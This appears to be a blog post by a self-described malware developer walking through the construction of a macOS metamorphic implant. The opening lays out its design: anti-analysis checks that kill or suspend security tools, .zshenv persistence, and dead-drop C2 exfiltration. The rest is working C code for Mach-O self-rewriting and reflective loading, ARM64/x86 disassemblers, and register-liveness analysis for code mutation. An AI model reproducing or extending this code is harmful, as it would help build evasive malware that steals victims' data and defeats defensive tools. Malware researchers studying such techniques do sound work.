Today’s post we’re just raw-dogging it from a degenerate malware dev perspective. We’re gonna cook up a self-contained metamorphic engine: a single piece carrying its own ARM64 disassembler, liveness analyzer, code generator, and multiple mutation algorithms, plus reflective loading, collection, and exfiltration capabilities.
Is this worth it in ’26? Probably not. Do I think it’s cool? Hell yeah.
Had some free time this weekend, so I figured why not finally write about a piece of code I’ve had sitting around for a while called Aether. You can find it at:
Most of it is written for x86, with a bit of ARM sprinkled in, but the ARM side is pretty half-baked and definitely not finished. Why? Partly because x86 is where most of my time went, and partly because I never fully committed to finishing the ARM implementation.
So I figured this is actually a good excuse to flip that around: build a proper ARM version, learn more about the architecture in the process, and clean up some of the rough edges.
As of writing this, it’s been tested on macOS (26.2).
What we’re talking about here is a macOS implant designed to infiltrate a target machine and exfiltrate data from it. Nothing groundbreaking, nothing magical, just messing around and exploring how things work.
On macOS, the implementation leans heavily on the Mach‑O executable format. Instead of treating it like a black box, we manipulate the structure directly parsing and modifying the binary so the code can transform itself while still remaining valid and executable.
The metamorphic core runs an N-generation mutation cycle with embedded ARM64/x86-64 disassemblers and liveness analyzer. Junk insertion, equivalent substitution, and block reordering transform the code each execution. Each generation gets encrypted with AES key chaining and reflectively loaded in-memory without touching disk.
Metamorphic basically means a program that rewrites its own body while keeping the same behavior. For a textbook explanation, Wikipedia’s got you: Metamorphic code - Wikipedia
The engine validates its environment before execution, checking domain, network, and hardware UUID. If the environment doesn’t match, it self-destructs immediately. The anti-analysis layer handles debugger detection and scans for macOS security tools using encrypted process-name hashes. LaunchDaemon-backed tools are suspended with SIGSTOP, while other processes are terminated with SIGTERM or SIGKILL. Stack-built strings prevent static extraction, and aggressive memory wiping covers traces.
Persistence uses .zshenv hooks and phased execution: dormant period, profiling, then exfiltration. For exfiltration we use a dead-drop C2 architecture with RSA+AES encryption, collect files via Spotlight, and back off exponentially to minimize detection.
So how do you build it?
Mach-O
Everything we do in this engine revolves around Mach-O. It’s the executable format on macOS: the container that holds your code, your data, your symbols, everything the kernel and dyld need to map a binary into memory and run it. If you want to mutate code at runtime, rewrite yourself to disk, or reflectively load a new image without touching dyld, you need to understand this format at the byte level.
Apple documents the structures in <mach-o/loader.h>. That header is your spot. Every struct we reference lives there, and the kernel source (xnu/bsd/kern/mach_loader.c) shows exactly how the loader validates and maps these structures. Worth reading if you want to know what you can get away with.
A Mach-O binary is laid out sequentially: header, load commands, then raw data. No index tables, no indirection. You walk it linearly.
┌──────────────────────┐ offset 0
│ mach_header_64 │ 32 bytes
├──────────────────────┤
│ load command 0 │ variable size
│ load command 1 │
│ ... │
│ load command N │
├──────────────────────┤ page-aligned boundary
│ __TEXT segment data │ (code lives here)
├──────────────────────┤
│ __DATA segment data │
├──────────────────────┤
│ __LINKEDIT │ (symbols, strings, fixups)
└──────────────────────┘
The header tells you how many load commands follow and their total size. Each load command describes a segment, and segments contain sections.
struct mach_header_64 is 32 bytes. The fields that matter to us:
struct mach_header_64 {
uint32_t magic; // MH_MAGIC_64 = 0xFEEDFACF
cpu_type_t cputype; // CPU_TYPE_ARM64 or CPU_TYPE_X86_64
cpu_subtype_t cpusubtype;
uint32_t filetype; // MH_EXECUTE, MH_DYLIB, MH_BUNDLE
uint32_t ncmds; // number of load commands
uint32_t sizeofcmds; // total size of all load commands
uint32_t flags; // MH_PIE, MH_NOUNDEFS, etc.
uint32_t reserved;
};
magic is your first sanity check. 0xFEEDFACF means 64-bit native endian. 0xCFFAEDFE means byte-swapped. If you see 0xFEEDFACE, that’s 32-bit and you’re in the wrong decade. In the dropper we validate this immediately after decryption to confirm we got a valid binary out:
uint32_t magic = *(uint32_t *)decrypted;
if (magic != 0xfeedfacf && magic != 0xcffaedfe) {
memset(decrypted, 0, dec_len);
free(decrypted);
return 1;
}
filetype matters when you’re constructing Mach-Os from scratch. MH_EXECUTE is a standalone binary. MH_DYLIB is a shared library. MH_BUNDLE is a loadable plugin (what dlopen expects). We use MH_DYLIB when wrapping mutated code because it gives us the most flexibility with reflective loading.
flags control linker and loader behavior. MH_PIE enables ASLR. MH_NOUNDEFS tells dyld there are no undefined symbols. MH_DYLDLINK marks it as dynamically linked. We set all three when constructing our wrapper:
mh->flags = MH_NOUNDEFS | MH_DYLDLINK | MH_PIE;
Alright, then how do we walk the load commands? That’s a good question homie. Every command starts with the same two fields:
struct load_command {
uint32_t cmd; // command type (LC_SEGMENT_64, LC_MAIN, ..)
uint32_t cmdsize; // total size of this command including any trailing data
};
You walk them by advancing cmdsize bytes each iteration. The kernel does the same thing. There’s no random access; you iterate linearly:
uint8_t *ptr = data + sizeof(struct mach_header_64);
for (uint32_t i = 0; i < mh->ncmds; i++) {
struct load_command *lc = (struct load_command *)ptr;
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (struct segment_command_64 *)ptr;
// handle segment
}
ptr += lc->cmdsize;
}
The commands we care about:
LC_SEGMENT_64 describes a memory region. Every segment has a virtual address, virtual size, file offset, file size, and protection flags. The kernel maps filesize bytes from fileoff to vmaddr, then zero-fills up to vmsize. This is how BSS works: vmsize > filesize and the difference is zeroed.
LC_MAIN gives us the entry point as an offset from __TEXT. Older binaries use LC_UNIXTHREAD instead, which embeds a full thread state struct with the instruction pointer set.
LC_SYMTAB and LC_DYSYMTAB point to symbol tables in __LINKEDIT. We need these when constructing valid Mach-Os for reflective loading; dyld validates their presence even if they’re empty.
LC_SEGMENT_64 is followed by zero or more section_64 structs, packed inline. The segment’s nsects field tells you how many:
struct segment_command_64 *seg = (struct segment_command_64 *)ptr;
struct section_64 *sections = (struct section_64 *)(seg + 1);
for (uint32_t j = 0; j < seg->nsects; j++) {
// sections[j].sectname - e.g. "__text", "__stubs", "__cstring"
// sections[j].segname - parent segment name
// sections[j].addr - virtual address
// sections[j].size - size in bytes
// sections[j].offset - file offset to raw data
}
The standard layout has 3 segments:
__PAGEZERO is a no-access mapping at address 0 that catches NULL pointer dereferences. filesize is 0, and vmsize is typically the entire low 4GB (0x100000000) on 64-bit binaries. No actual data.
__TEXT contains executable code and read-only data. Protection is r-x. Inside it, __text holds the actual machine code, __stubs and __stub_helper handle lazy binding, __cstring holds C string literals. The __text section is what we extract, disassemble, mutate, and write back.
__DATA contains writable data globals, static variables, Objective-C metadata. Protection is rw-.
__LINKEDIT holds symbol tables, string tables, code signatures, and fixup chains. No sections inside it just raw data referenced by other load commands.
And this is the core operation. Every time we need to mutate code, we walk the load commands looking for __TEXT.__text:
static struct section_64 *find_text(uint8_t *data) {
struct mach_header_64 *mh = (void *)data;
if (mh->magic != MH_MAGIC_64) return NULL;
uint8_t *p = data + sizeof(*mh);
for (uint32_t i = 0; i < mh->ncmds; i++) {
struct load_command *lc = (void *)p;
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (void *)p;
if (!strcmp(seg->segname, "__TEXT")) {
struct section_64 *s = (void *)(p + sizeof(*seg));
for (uint32_t j = 0; j < seg->nsects; j++)
if (!strcmp(s[j].sectname, "__text")) return &s[j];
}
}
p += lc->cmdsize;
}
return NULL;
}
Once you have the section, the code bytes are at data + section->offset, and section->size tells you how many bytes. On ARM64 every instruction is 4 bytes, so size / 4 gives you the instruction count. On x86-64 instructions are variable-length, which is a whole different problem.
Reading Your Own Binary
Self-modification starts with playing with yourself [PAUSE!]. _NSGetExecutablePath() from <mach-o/dyld.h> gives you the path to the running binary:
char path[1024];
uint32_t size = sizeof(path);
_NSGetExecutablePath(path, &size);
FILE *f = fopen(path, "rb");
fseek(f, 0, SEEK_END);
size_t len = ftell(f);
fseek(f, 0, SEEK_SET);
uint8_t *self = malloc(len);
fread(self, 1, len, f);
fclose(f);
Now self is a byte-for-byte copy of your own Mach-O in heap memory. Parse it, find __text, hand the code bytes to the disassembler, mutate, and you’re in business.
Constructing Mach-Os from Scratch
After mutation, we need to wrap the transformed code in a valid Mach-O for reflective loading. This means building the entire structure by hand: header, segments, sections, symbol tables. The wrapper constructs a minimal dylib:
uint8_t *wrap_macho(const uint8_t *code, size_t code_sz, size_t *out_sz) {
// header + load commands | __text code | __LINKEDIT
// Everything page-aligned (0x4000 on ARM64)
size_t code_off = PG_ALIGN(header_size);
size_t code_aln = PG_ALIGN(code_sz);
size_t link_off = code_off + code_aln;
size_t total = link_off + PG;
uint8_t *buf = calloc(1, total);
// ... fill in header, segments, sections, symtab ...
memcpy(buf + code_off, code, code_sz);
return buf;
}
Page alignment is critical: ARM64 macOS uses 16KB pages (0x4000), not 4KB like x86-64. Get this wrong and the kernel refuses to map your binary. The PG_ALIGN macro rounds up:
#define PG 0x4000
#define PG_ALIGN(x) (((x) + PG - 1) & ~(PG - 1))
The constructed Mach-O needs __PAGEZERO, __TEXT with a __text section, __LINKEDIT with at least empty symtab/strtab, and LC_SYMTAB/LC_DYSYMTAB commands pointing into it.
Skip any of these and dyld or the kernel will reject the image. We also include LC_DYLD_INFO_ONLY with zeroed fields; dyld checks for its presence even if there are no actual fixups.
So simply put the mutation engine doesn’t operate on abstract code. It operates on real Mach-O binaries. Every generation reads a Mach-O, extracts __text, transforms the instructions, wraps the result in a new Mach-O, and reflectively loads it. The format is the interface between mutation and execution. Get the parsing wrong and you c0rrupt code. Get the construction wrong and the loader rejects it. Get the alignment wrong and the kernel kills your process.
either way it’s a bitch
- Apple’s OS X ABI Mach-O File Format Reference: the original Apple documentation, archived because Apple pulled it, but still the most complete reference for the structures in mach-o/loader.h
- Exploring Mach-O, Part 3
- Snake&Apple I - Mach-O files on ARM64
- MACH-O(5) man page
- loader.h source
- Mac Hacker’s Handbook
Disassembly
Before you can mutate code, you need to understand it. Not at the source level, that’s long gone by the time you’re looking at a compiled binary. You need to understand it at the instruction level: what each 4-byte word or variable-length byte sequence actually does, which registers it reads, which it writes, whether it touches flags, whether it branches. Without this, mutation is just corruption.
We built our own disassemblers for both architectures. No Capstone, no Zydis, no external dependencies. The engine needs to be self-contained a single binary carrying everything it needs to understand and rewrite itself. External libraries mean more symbols to resolve, more surface for static analysis, and more things that can break during reflective loading. Rolling your own also means you decode exactly what the mutation engine needs and nothing more.
ARM64
ARM64 is the easier target. Every instruction is exactly 4 bytes, aligned on a 4-byte boundary. No variable-length encoding, no prefix bytes, and no ambiguity about where one instruction ends and the next begins. The ARM Architecture Reference Manual documents the encoding in sections C4 through C6, all bit-level specification.
You don’t need all of it. The mutation engine cares about data processing, loads/stores, branches, and system instructions; SIMD/FP we treat as opaque blobs. If none of this rings a bell, Google is your homie, then come back.
The decoder reads a 32-bit word and pattern-matches against encoding groups. ARM64 uses top-down bit classification: the upper bits identify the instruction class, lower bits encode operands. The bits() helper extracts arbitrary bit ranges:
static inline uint32_t bits(uint32_t x, int hi, int lo) {
return (x >> lo) & ((1u << (hi - lo + 1)) - 1u);
}
Every instruction decodes into an arm64_inst_t struct that captures everything the mutation engine needs:
typedef struct {
uint32_t raw;
arm_op_t op;
uint8_t rd, rn, rm, ra;
int64_t imm;
int64_t target;
bool is_64bit;
bool sets_flags;
bool reads_flags;
bool valid;
bool is_control_flow;
addr_mode_t addr_mode;
uint8_t regs_read[4];
uint8_t regs_written[2];
uint8_t num_regs_read;
uint8_t num_regs_written;
} arm64_inst_t;
The register tracking arrays are the important part. regs_read and regs_written feed directly into liveness analysis. Every decode path must populate these correctly or the mutation engine will clobber live registers and crash the binary.
Decoding starts with branches since they’re the most important for control flow analysis.
A B or BL instruction matches when bits [30:26] are 00101 (bit 31 is the link bit):
/* B / BL */
if ((w & 0x7C000000) == 0x14000000) {
bool link = (w >> 31) & 1;
int64_t off = sxt(bits(w, 25, 0), 26) << 2;
out->op = link ? ARM_OP_BL : ARM_OP_B;
out->target = off;
out->is_control_flow = true;
if (link) wr_track(out, 30); // BL writes X30 (link register)
return true;
}
The decoder sign-extends the 26-bit immediate to 64 bits. The << 2 accounts for the fact that ARM64 branch offsets are in units of 4 bytes (instruction-aligned). BL additionally writes X30 (the link register); miss this and liveness analysis thinks X30 is dead after a function call, which it isn’t.
Conditional branches (B.cond, CBZ, CBNZ, TBZ, TBNZ) each have their own encoding. B.cond reads flags (NZCV), CBZ/CBNZ read a register and compare against zero, TBZ/TBNZ test a specific bit. The decoder marks reads_flags for B.cond so the mutation engine knows not to insert flag-clobbering junk before it:
/* B.cond */
if ((w & 0xFF000010) == 0x54000000) {
out->op = ARM_OP_B_COND;
out->target = sxt(bits(w, 23, 5), 19) << 2;
out->cond = (arm_cond_t)(w & 0xF);
out->reads_flags = true;
out->is_control_flow = true;
return true;
}
Data processing instructions are where the encoding gets dense. ADD/SUB immediate, ADD/SUB shifted register, logical shifted register, logical immediate: each has its own bit pattern. The decoder handles aliases: CMP is SUBS with Rd=XZR, MOV is ORR Rd, XZR, Rm, TST is ANDS XZR, Rn, Rm.
These aliases matter because the mutation engine needs to know the semantic operation, not just the raw encoding. When we substitute MOV X1, X2 with an equivalent, we need to know it’s a move, not an OR with zero:
/* MOV reg alias: ORR Xd, XZR, Xm */
if (opc == 1 && !N && out->rn == 31 && out->shift_type == 0 && out->shift_amount == 0) {
out->op = ARM_OP_MOV_REG;
rd_track(out, out->rm);
wr_track(out, out->rd);
return true;
}
Logical immediates use ARM64’s bitmask encoding, one of the more painful parts of the ISA. A logical immediate isn’t stored as a plain value. It’s encoded as three fields, N, immr, and imms, which together describe a repeating bit pattern, and the decoder reconstructs the 64-bit mask from these fields. The ARM ARM describes this in section C3.4.4. The algorithm finds the element size from the highest set bit of N:NOT(imms), constructs a base pattern, rotates it, then replicates it across 64 bits. Getting this wrong means your equivalent substitutions produce different values.
Also, load/store decoding tracks addressing modes because they affect register liveness. A pre-index [Xn, #imm]! writes back to the base register, so it’s both a read and a write. A post-index [Xn], #imm does the same. Plain offset [Xn, #imm] only reads the base. The rn_is_sp flag marks instructions where register 31 means SP rather than XZR (most load/store instructions use SP, most data processing uses XZR). This distinction matters for stack frame analysis.
Load/store pairs (LDP/STP) transfer two registers at once. The decoder tracks both Rd and Ra (the second register, encoded in the Rt2 field). For stores, both are reads. For loads, both are writes. Miss the second register and liveness analysis has a blind spot.
System instructions (SVC, MRS, MSR, NOP, barriers) and PAC instructions (PACIASP, AUTIASP, RETAA) get decoded but marked is_privileged. The mutation engine won’t touch these; reordering a PACIASP relative to its matching AUTIASP breaks pointer authentication and crashes the process.
SIMD/FP instructions we recognize but don’t decode internally. They get tagged as ARM_OP_SIMD and treated as opaque barriers. The mutation engine won’t insert junk between SIMD sequences or reorder them. This is conservative, but decoding the full NEON/SVE instruction set would double the disassembler size for minimal mutation benefit.
x86-64
I’ll keep this one short but x86-64 is a different beast entirely. Variable-length instructions from 1 to 15 bytes. Legacy prefixes, REX prefixes, VEX prefixes, ModR/M bytes, SIB bytes, displacements, immediates all optional, all context-dependent. See “The Intel Software Developer’s Manual (SDM) Volume 2”
The decoder is a single-pass state machine. It walks the byte stream consuming prefixes, then the opcode, then ModR/M, then SIB, then displacement, then immediate. Each stage determines whether the next stage exists:
[prefixes] [REX] [opcode 1-3 bytes] [ModR/M] [SIB] [disp 1/2/4] [imm 1/2/4/8]
Prefixes come first. Legacy prefixes (0x66 operand size, 0xF0 LOCK, 0xF2/0xF3 REP, segment overrides) can appear in any order. REX prefixes (0x40-0x4F) extend register encoding from 3 bits to 4 bits, giving access to R8-R15. The decoder consumes these in a loop:
while (p < end && out->prefix_count < 4) {
uint8_t b = *p;
if ((b & 0xF0) == 0x40) { /* REX */
rex_w = (b >> 3) & 1; // 64-bit operand size
rex_r = (b >> 2) & 1; // extends ModR/M reg field
rex_x = (b >> 1) & 1; // extends SIB index field
rex_b = b & 1; // extends ModR/M rm or SIB base
p++; continue;
}
if (!is_prefix(b)) break;
p++; out->prefix_count++;
}
VEX and EVEX prefixes (used by AVX/AVX-512) we skip entirely. If we see 0xC4, 0xC5, or 0x62, we mark the instruction as SIMD and consume the rest as opaque. Same reasoning as ARM64 not worth decoding for mutation purposes.
The opcode is 1, 2, or 3 bytes. Single-byte opcodes cover most common instructions. Two-byte opcodes start with 0x0F (the escape byte). Three-byte opcodes start with 0x0F 0x38 or 0x0F 0x3A. The needs_modrm() function determines whether a ModR/M byte follows this is a lookup against the opcode tables in the SDM.
ModR/M is where x86 encoding gets interesting. It’s a single byte with three fields: mod (2 bits), reg (3 bits), rm (3 bits). mod=3 means register-to-register. mod=0/1/2 means memory operand with 0/1/4 bytes of displacement. When rm=4, a SIB byte follows for scaled-index addressing ([base + index*scale + disp]). When mod=0 and rm=5, it’s RIP-relative addressing critical for position-independent code on x86-64.
The SIB byte adds another layer: scale (2 bits), index (3 bits), base (3 bits). Index register 4 (RSP) means “no index”. Base register 5 with mod=0 means “no base, disp32 only”. These special cases are documented in SDM Table 2-3. Get them wrong and your displacement calculations are off, which means your branch target resolution is wrong, which means your control flow analysis is wrong, which means you’re fucked.
REX bits extend the 3-bit register fields to 4 bits. REX.R extends ModR/M.reg, REX.B extends ModR/M.rm and SIB.base, REX.X extends SIB.index. This is how x86-64 accesses R8-R15:
out->reg = reg3 | (rex_r ? 8 : 0);
uint8_t base_reg = rm3 | (rex_b ? 8 : 0);
After raw decoding, we run a second pass to determine the semantic operation and populate register tracking. This is separated from decoding because x86 uses the same opcode bytes for different operations depending on the ModR/M extension field (/r). Opcode 0xF7 with /r=3 is NEG, with /r=4 is MUL, with /r=6 is DIV. The classifier handles all of these:
if (op0 == 0xF7) {
switch (ext) {
case 0: inst->op = X86_OP_TEST; inst->sets_flags = true; ...
case 2: inst->op = X86_OP_NOT; ...
case 3: inst->op = X86_OP_NEG; inst->sets_flags = true; ...
case 4: inst->op = X86_OP_MUL; inst->sets_flags = true; ...
case 6: inst->op = X86_OP_DIV; ...
}
}
Register tracking on x86 is more of a bitch than on ARM64 because of implicit operands. MUL implicitly reads RAX and writes RDX:RAX. DIV reads RDX:RAX and writes RAX and RDX. PUSH reads RSP and writes RSP. CALL reads RSP, writes RSP, and (per the System V ABI) clobbers all volatile registers. The classifier encodes the System V calling convention directly:
static const bool x86_volatile[16] = {
true, /* rax */ true, /* rcx */ true, /* rdx */ false, /* rbx */
false, /* rsp */ false, /* rbp */ true, /* rsi */ true, /* rdi */
true, /* r8 */ true, /* r9 */ true, /* r10 */ true, /* r11 */
false, /* r12 */ false, /* r13 */ false, /* r14 */ false, /* r15 */
};
This table drives liveness analysis across function calls. After a CALL, all volatile registers are assumed clobbered (dead). Non-volatile registers (RBX, RBP, R12-R15) are preserved by the callee and remain live.
The two architectures share nothing at the encoding level. ARM64 is clean and regular: fixed-width, consistent field positions, orthogonal register encoding. x86-64 is a 40-year accumulation of extensions bolted onto an 8-bit microprocessor ISA.
The ModR/M/SIB/REX machinery alone is more complex than the entire ARM64 encoding scheme. Building a disassembler for both means solving two fundamentally different problems.
Liveness Analysis
You can’t just shove instructions into a binary and hope for the best. Every register in a running program is either carrying a value that matters something a later instruction will read or it’s dead, holding garbage nobody cares about. Insert a MOV X3, #0x42 at the wrong point and you’ve just destroyed a function argument, a loop counter, or a pointer that was about to be dereferenced. The piece crashes, or produces wrong shit silently.
Liveness analysis tells us which registers are cool to clobber at every point in the code. It’s the difference between a metamorphic engine that produces working binaries and one that produces shit.
So consider this ARM64 sequence a simple function body:
0: MOV X0, X1 ; X0 = X1
1: ADD X2, X0, #8 ; X2 = X0 + 8
2: LDR X3, [X2] ; X3 = mem[X2]
3: MUL X4, X3, X0 ; X4 = X3 * X0
4: STR X4, [X2, #16] ; mem[X2+16] = X4
5: ADD X5, X4, X3 ; X5 = X4 + X3
6: SUB X6, X5, #1 ; X6 = X5 - 1
7: CMP X6, #0 ; flags = compare(X6, 0)
8: B.NE <somewhere> ; branch if not equal
9: RET ; return X0
Say we want to insert junk between instructions 4 and 5. Which registers can we clobber?
Naively, you might look at instruction 4 and say “X4 was just written, it’s done.” Nah. Instruction 5 reads X4. Clobber it and you’ve broken the computation.
You might think X0 is free since it was last written at instruction 0 and last read at instruction 3. But instruction 9 is RET, and the ARM64 calling convention returns values in X0. The value from instruction 0 flows all the way to the return. X0 is live across the entire sequence.
This is why you need dataflow analysis. Eyeballing doesn’t scale, and getting it wrong means a broken binary.
Every instruction has two properties that matter: which registers it reads and which registers it writes. The disassembler already extracts these during decoding, but liveness analysis formalizes them into bitmasks.
We represent register sets as a uint32_t bitmask: bits 0-30 for X0-X30, bit 31 for the NZCV flags:
typedef uint32_t regset_t;
#define REG_BIT(r) (1u << (r))
#define FLAGS_BIT (1u << 31)
Extracting use/def from a decoded instruction is mechanical:
static void inst_usedef(const arm64_inst_t *inst, regset_t *use, regset_t *def) {
*use = *def = 0;
if (!inst->valid) {
*use = *def = 0xFFFFFFFFu; /* unknown = assume everything */
return;
}
for (int i = 0; i < inst->num_regs_read; i++)
*use |= REG_BIT(inst->regs_read[i]);
for (int i = 0; i < inst->num_regs_written; i++)
*def |= REG_BIT(inst->regs_written[i]);
if (inst->reads_flags) *use |= FLAGS_BIT;
if (inst->sets_flags) *def |= FLAGS_BIT;
}
Unknown instructions get 0xFFFFFFFF for both use and def. This means “assume it reads and writes everything.” Conservative, but cool. An unknown instruction acts as a barrier the engine won’t insert junk around it.
This is the fundamental principle: over-approximation preserves correctness, under-approximation breaks programs.
Special cases matter too. BL (function call) doesn’t just branch: it reads X0-X7 (arguments per the AAPCS64 calling convention), clobbers X0-X18 plus flags (caller-saved registers), and writes X30 (link register). RET implicitly reads X0 (return value) and X30. Miss any of these and your liveness data is wrong.
if (inst->op == ARM_OP_BL || inst->op == ARM_OP_BLR) {
*use |= 0x000000FFu; /* X0-X7 */
*def |= 0x0007FFFFu | FLAGS_BIT; /* X0-X18 + flags */
}
if (inst->op == ARM_OP_RET || inst->op == ARM_OP_RETAA) {
*use |= REG_BIT(0) | REG_BIT(30); /* return value + link register */
}
These rules come straight from the ARM architecture’s procedure call standard. Get this wrong and you’ll clobber a register that a called function was supposed to preserve, or destroy a return value.
This whole thing is a backward analysis. You start at the end of the code and work toward the beginning, propagating information about which registers are needed in the future.
The equation at each instruction i:

live_in[i] = use[i] ∪ (live_out[i] − def[i])

Meaning? A register is live before instruction i if instruction i reads it (use), or if it’s live after instruction i and instruction i doesn’t write it (live_out minus def). If an instruction writes a register, it “kills” the previous value: anything live after the instruction that was defined by it doesn’t need to be live before it.
live_out[i] is simply live_in[i+1] in straight-line code. At branches it’s the union of all successor blocks’ live_in sets.
void liveness_window(const arm64_inst_t *insns, int n,
inst_live_t *out, int win_start, int win_end) {
for (int i = win_start; i <= win_end; i++)
inst_usedef(&insns[i], &out[i].use, &out[i].def);
regset_t live = 0xFFFFFFFFu; /* assume worst case past window */
/* scan past window to refine */
regset_t la_def = 0, la_use = 0;
int la_limit = (win_end + 17 < n) ? win_end + 17 : n;
for (int i = win_end + 1; i < la_limit; i++) {
regset_t u, d;
inst_usedef(&insns[i], &u, &d);
la_use |= u & ~la_def;
la_def |= d;
if (insns[i].is_control_flow) break;
}
regset_t proven_dead = la_def & ~la_use;
live &= ~proven_dead;
for (int i = win_end; i >= win_start; i--) {
out[i].live_out = live;
live = out[i].use | (live & ~out[i].def);
out[i].live_in = live;
}
}
Notice the initialization: live = 0xFFFFFFFFu. Every register assumed live past the window boundary. This is deliberate over-approximation. We don’t know what code follows the mutation window, so we assume the worst everything is needed.
The look-ahead refines this. It scans up to 16 instructions past the window looking for registers that get written before being read. Those are provably dead at the window boundary, so we can remove them from the live set:
regset_t proven_dead = la_def & ~la_use;
live &= ~proven_dead;
This is the tension in the whole system. Conservative analysis is always correct (you’ll never corrupt a live value) but it leaves dead registers on the table. Every register you can’t prove dead is a mutation opportunity lost. The look-ahead buys back some of those opportunities without risking correctness.
Full-Function Analysis
Window mode works for local mutations, but block permutation needs global liveness across the entire function. That requires basic block splitting and fixed-point iteration:
int liveness_full(const arm64_inst_t *insns, int n, inst_live_t *out) {
/* Find basic block boundaries */
bool *is_leader = calloc(n, sizeof(bool));
is_leader[0] = true;
for (int i = 0; i < n; i++) {
if (insns[i].is_control_flow) {
if (i + 1 < n) is_leader[i + 1] = true;
int tgt_idx = i + (int)(insns[i].target / 4);
if (tgt_idx >= 0 && tgt_idx < n)
is_leader[tgt_idx] = true;
}
}
/* ... build block list ... */
/* Iterate to fixed point */
for (int iter = 0; iter < 1000; iter++) {
bool changed = false;
for (int b = nblocks - 1; b >= 0; b--) {
/* Compute block live_out from successors' live_in */
regset_t new_out = 0;
/* Fallthrough successor */
if (e + 1 < n && /* not unconditional branch */)
new_out |= out[e + 1].live_in;
/* Branch target successor */
if (insns[e].is_control_flow && insns[e].target != 0) {
int tgt = e + (int)(insns[e].target / 4);
if (tgt >= 0 && tgt < n)
new_out |= out[tgt].live_in;
}
if (new_out != blk_live_out[b]) {
blk_live_out[b] = new_out;
changed = true;
}
/* Backward pass within block */
regset_t live = blk_live_out[b];
for (int i = e; i >= s; i--) {
out[i].live_out = live;
live = out[i].use | (live & ~out[i].def);
out[i].live_in = live;
}
}
if (!changed) break;
}
}
A basic block is a maximal sequence of instructions with no branches in and no branches out except at the boundaries. Block leaders are instruction 0, any branch target, and any instruction following a branch. The algorithm splits the code at these points, then iterates the backward
pass across blocks until nothing changes. At branches, live_out is the union of all successors’ live_in conditional branches have two successors (target and fallthrough), unconditional branches have one, and RET has none (only return-convention registers: X0, FP, LR).
Convergence is guaranteed because the live sets can only grow (we’re computing a least fixed point over a monotone lattice), and the lattice is finite (32 bits). In practice it converges in 2-4 iterations for typical function sizes.
Not all dead registers are fair game. The ARM64 calling convention (AAPCS64) designates X19–X28 as callee-saved. A function must preserve their values across calls. Even if liveness analysis says X19 is dead within a window, clobbering it without saving/restoring violates the ABI and corrupts the caller’s state.
The engine excludes these unconditionally:
static inline regset_t dead_regs(const inst_live_t *live, int idx) {
const regset_t CALLEE_SAVED = 0x1FF80000u; /* bits 19-28 */
return ~live[idx].live_out & 0x1FFFFFFFu & ~CALLEE_SAVED;
}
That mask removes X19–X28, X29 (frame pointer), X30 (link register), and SP from the dead set regardless of what liveness says. Only X0–X18 are candidates for junk insertion the volatile registers that functions are allowed to trash.
Loop-Aware Analysis
Standard liveness misses a subtle case inside loops. A register might appear momentarily dead at one point in a loop body, but the loop iterates, and on the next iteration that register is live again. If you insert junk that clobbers it, the first iteration works fine but subsequent iterations read garbage.
The engine detects loops by scanning for backward branches: any branch whose target is at or before the branch itself:
int detect_loops(const arm64_inst_t *insns, int n, bool *loop_body) {
int found = 0;
for (int i = 0; i < n; i++) {
if (!insns[i].is_control_flow || insns[i].target == 0) continue;
if (insns[i].op == ARM_OP_BL || insns[i].op == ARM_OP_BLR) continue;
int tgt = i + (int)(insns[i].target / 4);
if (tgt > i) continue; /* forward branch */
if (tgt < 0) tgt = 0; /* clamp: branch out of this window */
for (int j = tgt; j <= i; j++)
loop_body[j] = true;
found++;
}
return found;
}
Instructions inside a loop body get their dead set further restricted: the engine computes the union of all live_in and live_out sets across the entire loop. Any register that’s live anywhere in the loop is excluded from the dead set for every instruction in that loop:
regset_t loop_live_regs(const arm64_inst_t *insns, const inst_live_t *live,
int n, const bool *loop_body, int idx) {
/* Find tightest enclosing loop */
/* ... */
regset_t all_live = 0;
for (int i = best_lo; i <= best_hi; i++)
all_live |= live[i].live_in | live[i].live_out;
return all_live;
}
This is aggressive: it kills a lot of mutation opportunities inside loops. But loops are where correctness bugs are hardest to find (they only manifest after N iterations), so the conservatism is cool with me for now.
Also, functions spill values to the stack via STP/LDP pairs. If you insert a junk STR to a stack offset that holds a spilled callee-saved register, you’ve corrupted it just as surely as writing to the register directly.
The engine tracks SP-relative stores and loads as “stack slots” with their own parallel liveness analysis:
int stack_liveness(const arm64_inst_t *insns, int n, slot_live_t *out) {
stack_slot_t slots[16]; /* 16 slot bits in the masks below */
int num_slots = 0;
/* Discover SP-relative accesses, build slot table */
for (int i = 0; i < n; i++) {
int16_t off; uint8_t sz; bool store;
if (!is_sp_access(&insns[i], &off, &sz, &store)) continue;
int s = find_or_add_slot(slots, &num_slots, off, sz);
if (s < 0) continue; /* table full - skip extra slots */
if (store) out[i].def |= (1u << s);
else out[i].use |= (1u << s);
}
/* Backward dataflow on slot bitmasks */
uint16_t live = 0;
for (int i = n - 1; i >= 0; i--) {
out[i].live_out = live;
live = out[i].use | (live & ~out[i].def);
out[i].live_in = live;
}
return num_slots;
}
Same backward dataflow, different domain. Instead of 32 register bits, it’s 16 stack slot bits. Before inserting any stack-touching junk, the engine runs something like:
static inline bool slot_is_aight(const slot_live_t *slive, int idx,
int16_t offset, uint8_t size) {
for (int s = 0; s < slive[0].num_slots; s++) {
if (!(slive[idx].live_out & (1u << s))) continue;
int16_t so = slive[0].slots[s].offset;
uint8_t ss = slive[0].slots[s].size;
if (offset < so + ss && so < offset + size)
return false; /* overlaps a live slot */
}
return true;
}
Liveness tells you what’s dead. Def-use chains tell you what’s connected. A chain links a register definition (write) to all its consumers (reads) before the next redefinition. This is what makes register renaming safe.
If X3 is defined at instruction 5 and read at instructions 8 and 12, that’s one chain: def=5, uses=[8,12]. To rename X3 to X7 across this chain, the engine verifies X7 is dead at the def point and stays dead through all uses. If so, it patches the register field in all three instructions:
int rename_reg(uint8_t *code, int n, const inst_live_t *live,
const def_use_t *chain, uint8_t new_reg) {
uint8_t old_reg = chain->reg; /* the register this chain carries */
regset_t bit = REG_BIT(new_reg);
if (live[chain->def_idx].live_out & bit) return 0;
for (int i = 0; i < chain->num_uses; i++) {
if (live[chain->use_idx[i]].live_in & bit) return 0;
}
/* Safe - patch all occurrences */
patch_reg(code, chain->def_idx, old_reg, new_reg);
for (int i = 0; i < chain->num_uses; i++)
patch_reg(code, chain->use_idx[i], old_reg, new_reg);
return 1;
}
